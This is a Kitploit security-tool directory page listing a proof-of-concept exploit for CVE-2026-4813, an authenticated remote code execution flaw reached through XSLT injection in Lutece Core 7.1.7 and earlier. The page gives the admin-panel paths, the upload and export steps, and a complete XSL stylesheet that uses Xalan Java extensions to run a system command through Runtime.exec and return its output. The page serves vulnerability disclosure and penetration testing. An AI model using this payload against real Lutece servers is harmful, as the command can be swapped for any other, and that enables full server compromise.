Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-4813 — Lutece Core における XSLT インジェクションを介した認証済みリモートコード実行の概念実証エクスプロイト。細工された XSL スタイルシートによるコマンド実行を実証します。 | Kitploit
ツール/GitHubGitHub/trachinus/cve-2026-4813
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Lutece Core における XSLT インジェクションを介した認証済みリモートコード実行の概念実証エクスプロイト。細工された XSL スタイルシートによるコマンド実行を実証します。

リポジトリを見る
1日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-4813(CVSS-B 9.4 重大)

Lutece Core <= 7.1.7 中通过 XSLT 注入实现的身份验证后 RCE

> 详细说明及更多内容请访问我的网站 <

PoC

您需要一个具有管理员权限的账户。

  1. 在管理面板中,导航至 XSL 导出管理页面: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. 点击“添加新的转换表”。

  3. 上传一个包含有效载荷(简单的 id 命令)的 .xsl 文件:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. 保存新的 XSL 表。

  2. 导航至导出用户页面: /jsp/admin/user/ExportUsers.jsp

  3. 选择我们刚刚创建的转换表并确认。

  4. id 命令的结果应出现在导出的文件中。

ツールをダウンロード